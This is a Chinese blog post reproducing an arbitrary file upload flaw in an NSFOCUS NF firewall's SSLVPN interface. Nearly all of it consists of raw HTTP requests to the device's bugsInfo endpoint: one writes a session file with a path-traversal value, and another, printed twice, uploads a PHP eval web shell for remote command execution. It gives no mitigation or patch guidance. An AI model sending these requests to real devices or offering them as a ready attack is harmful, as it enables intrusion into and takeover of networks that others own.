1zzZ

  博客园  :: 首页  :: 新随笔  :: 联系 :: 订阅 订阅  :: 管理
  10 随笔 :: 0 文章 :: 1 评论 :: 5540 阅读
漏洞复现-绿盟 NF下一代防火墙 任意文件上传漏洞

漏洞描述:

  绿盟 SSLVPN 存在任意文件上传漏洞,攻击者通过发送特殊的请求包可以获取服务器权限,进行远程命令执行

漏洞影响:

  绿盟 SSLVPN

网络测绘:

  

 出现漏洞的端口为 8081

1
2
3
4
5
6
7
8
9
10
POST /api/v1/device/bugsInfo HTTP/1.1
Content-Type: multipart/form-data; boundary=1d52ba2a11ad8a915eddab1a0e85acd9
Host:
 
--1d52ba2a11ad8a915eddab1a0e85acd9
Content-Disposition: form-data; name="file"; filename="sess_82c13f359d0dd8f51c29d658a9c8ac71"
 
lang|s:52:"../../../../../../../../../../../../../../../../tmp/";
 
--1d52ba2a11ad8a915eddab1a0e85acd9--

 

 

1
2
3
4
5
6
7
8
9
10
11
POST /api/v1/device/bugsInfo HTTP/1.1
Content-Type: multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef
Host:
 
--4803b59d015026999b45993b1245f0ef
Content-Disposition: form-data; name="file"; filename="compose.php"
 
 
<?php eval($_POST['cmd']);?>
 
--4803b59d015026999b45993b1245f0ef--

  

 

1
2
3
4
5
6
7
8
9
10
11
POST /api/v1/device/bugsInfo HTTP/1.1
Content-Type: multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef
Host:
 
--4803b59d015026999b45993b1245f0ef
Content-Disposition: form-data; name="file"; filename="compose.php"
 
 
<?php eval($_POST['cmd']);?>
 
--4803b59d015026999b45993b1245f0ef--

  

posted on   _GGBOND  阅读(2212)  评论(0编辑  收藏  举报
相关博文:
·  泛微OA e-office平台uploadify.php任意文件上传漏洞
·  深信服SG上网优化管理系统catjs.php任意文件读取漏洞
·  用友GRP-U8 UploadFileData任意文件上传漏洞
·  【漏洞复现】深信服下一代防火墙NGAF存在任意文件读取漏洞
·  任意文件上传漏洞详解
阅读排行:
· 地球OL攻略 —— 某应届生求职总结
· 周边上新:园子的第一款马克杯温暖上架
· Open-Sora 2.0 重磅开源!
· 提示词工程——AI应用必不可少的技术
· .NET周刊【3月第1期 2025-03-02】
点击右上角即可分享
微信分享提示
SQL AI 助手